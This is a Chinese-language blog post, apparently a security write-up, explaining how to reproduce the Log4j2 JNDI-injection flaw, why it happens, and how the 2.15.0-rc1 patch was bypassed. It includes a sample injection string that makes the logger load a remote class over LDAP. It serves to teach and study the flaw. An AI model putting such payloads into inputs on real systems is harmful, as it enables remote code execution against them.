Log4j2漏洞复现&原理&补丁绕过

简介: Log4j2漏洞复现&原理&补丁绕过

前言


Log4j2漏洞总的来说就是:因为Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议即可),并会通过名称从ldap服务端其获取对应的Class文件,并使用ClassLoader在本地加载Ldap服务端返回的Class类。


这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容

(如:恶意内容${jndi:ldap://localhost:9999/Test}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。


漏洞复现


这里我一共使用了两个jdk版本



8u202的情况比较特殊

研究了两者的不同,发现唯一不同的就是我司这个idea启的project带有springboot的库。

然后看了一篇文章



明白了其中的原因

还可以参考以往的jndi注入




为了方便本地测试,就把jdk版本降下来了

首先拉一个maven项目,把dependency搞上去



然后直接搞上一个poc


246a73371e62978572132bed1a759308_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


复现很简单 ,触发没有难度,就是个jndi注入


撸一发各家的情报。



360,用的是挂恶意类的方法来做复现,弹个计算器,我也来弹一个吧。



95b31bfe52b12bb6f3a7761e191dd6c6_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png



他这里是用的System.setProperty来做的 ,用的是rmi,和网上通用的ldap的poc不同,也是去请求一个外链,协议不同而已,不过通常情况下rmi限制更多。

详细用法可以参考fastjson的利用。


原理



漏洞的最终的触发点在lookup上,然后用lookup去发请求。

然后jndiName是用户可控的,也就是在log中的记录。

因此导致了漏洞产生


补丁绕过


这里的绕过指的是绕过

log4j-2.15.0-rc1


这个版本

首先看一看新版和老版的对比


b0094546d0046db141c2ed7d96249f3e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


点进去看一下


eec14ba7efbdb660075ef4f0dbb5d667_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


这里对scheme和host做了白名单校验,如果不在这里面就走return null这段逻辑。

但是,这个白名单都是需要自己配置的,默认是空。那么意思就是说,如果自己不去配置,那就莫得法来绕过,因为是白名单。

再看看怎么修复lookup的



这里把原来的直接formats解析做了限制,还写了一个withoutLookupOptions方法。



跟一下这个方法看看。



曰死,我们着重看一下这段。



这个判断很有意思,在老版本,这个lookup是默认开启的,那么!过去就是默认不开启,于是注入payload是能够走的通的。

现在新版本lookups是默认不开启的,如果想要开启,需要自己手动去配置。



看,像上面这些configuration和options都是需要手动进行配置的。

也就是说,这个版本基本没啥问题了,那为啥还能绕过呢。

继续比对最新版本和可以被绕过的版本



然后看看log4j家的开发,这个叫做rgoers的小伙子是怎么修复这个漏洞的



进入代码查看



这里是catch一个异常,从字面意思理解就是url的语法异常,原本catch后面是木有写东西的,但是现在加上了两行语句,然后return了null

什么意思呢?

意思就是先利用url语法错误报错然后把条错误语句注入到log里,然后payload解析,然后导致漏洞发生。

原先因为没有加上return null这个语句,所以语句不会被return,然后会接着走下面的代码逻辑,就中套了。

但是现在return之后,就直接跳出去了,就莫得事情了。

但是绕过归绕过,虽然这里绕过了,但是配置那块,指定是绕不过的,除非自己配置就有问题,那就怪不得别人。



根据官方文档来看,log4j2有多种配置文件的方法,并且到了2.15.0-rc1版本,默认配置就是安全的,因为默认没有配置文件,需要自己去创建,因此默认配 置为空,如果自己配置的时候不乱来,就可以了。


相关文章
|
6月前
|
SQL 关系型数据库 MySQL
Mysql 的binlog日志的原理【4月更文挑战第1天】
【4月更文挑战第1天】 MySQL的binlog(二进制日志)是一个记录数据库更改的日志文件,它主要用于复制和恢复操作。以下是binlog日志的工作原理的简要概述: **事件写入**:当MySQL服务器执行一个事务时,它会将该事务中所有对数据库的修改操作(如INSERT、UPDATE和DELETE等)记录为一个事件(event)。这些事件包含了修改操作的相关信息,如操作类型、涉及的表、修改的行等。
142 1
|
6月前
|
存储 缓存 Java
浅析JAVA日志中的几则性能实践与原理解释
本篇文章通过几个技术点说明日志记录过程中的性能实践,计算机领域的性能往往都遵循着冰山法则,即你能看得见的、程序员能感知的只是其中的一小部分,还有大量的细节隐藏在冰山之下。
|
1月前
|
SQL 存储 关系型数据库
美团面试:binlog、redo log、undo log的底层原理是什么?它们分别实现ACID的哪个特性?
老架构师尼恩在其读者交流群中分享了关于 MySQL 中 redo log、undo log 和 binlog 的面试题及其答案。这些问题涵盖了事务的 ACID 特性、日志的一致性问题、SQL 语句的执行流程等。尼恩详细解释了这些日志的作用、所在架构层级、日志形式、缓存机制以及写文件方式等内容。他还提供了多个面试题的详细解答,帮助读者系统化地掌握这些知识点,提升面试表现。此外,尼恩还推荐了《尼恩Java面试宝典PDF》和其他技术圣经系列PDF,帮助读者进一步巩固知识,实现“offer自由”。
美团面试:binlog、redo log、undo log的底层原理是什么?它们分别实现ACID的哪个特性?
|
1月前
|
存储 缓存 关系型数据库
MySQL事务日志-Redo Log工作原理分析
事务的隔离性和原子性分别通过锁和事务日志实现,而持久性则依赖于事务日志中的`Redo Log`。在MySQL中,`Redo Log`确保已提交事务的数据能持久保存,即使系统崩溃也能通过重做日志恢复数据。其工作原理是记录数据在内存中的更改,待事务提交时写入磁盘。此外,`Redo Log`采用简单的物理日志格式和高效的顺序IO,确保快速提交。通过不同的落盘策略,可在性能和安全性之间做出权衡。
1643 14
|
2月前
|
存储 缓存 关系型数据库
redo log 原理解析
redo log 原理解析
40 0
redo log 原理解析
|
2月前
|
设计模式 SQL 安全
PHP中的设计模式:单例模式的深入探索与实践在PHP的编程实践中,设计模式是解决常见软件设计问题的最佳实践。单例模式作为设计模式中的一种,确保一个类只有一个实例,并提供全局访问点,广泛应用于配置管理、日志记录和测试框架等场景。本文将深入探讨单例模式的原理、实现方式及其在PHP中的应用,帮助开发者更好地理解和运用这一设计模式。
在PHP开发中,单例模式通过确保类仅有一个实例并提供一个全局访问点,有效管理和访问共享资源。本文详细介绍了单例模式的概念、PHP实现方式及应用场景,并通过具体代码示例展示如何在PHP中实现单例模式以及如何在实际项目中正确使用它来优化代码结构和性能。
49 2
|
2月前
|
存储 关系型数据库 MySQL
binlog、redolog、undo log底层原理及ACID特性实现分享
在数据库管理系统中,日志机制是确保数据一致性、完整性和可靠性的关键组件。MySQL数据库中的binlog、redolog和undolog作为其核心日志系统,各自扮演着不同但同样重要的角色。本文将深入探讨这三种日志的底层原理以及它们如何分别实现ACID(原子性、一致性、隔离性、持久性)特性的不同方面。
57 0
|
3月前
|
消息中间件 监控 搜索推荐
OpenFeign日志组件Logger原理与应用
该文章详细解释了如何在OpenFeign中配置并使用请求和响应的GZIP压缩功能。
|
4月前
|
运维 中间件 数据库
浅析JAVA日志中的性能实践与原理解释问题之元信息打印会导致性能急剧下降问题如何解决
浅析JAVA日志中的性能实践与原理解释问题之元信息打印会导致性能急剧下降问题如何解决
|
4月前
|
开发框架 缓存 Java
浅析JAVA日志中的性能实践与原理解释问题之"Garbage Free"技术的实现方式问题如何解决
浅析JAVA日志中的性能实践与原理解释问题之"Garbage Free"技术的实现方式问题如何解决
下一篇
无影云桌面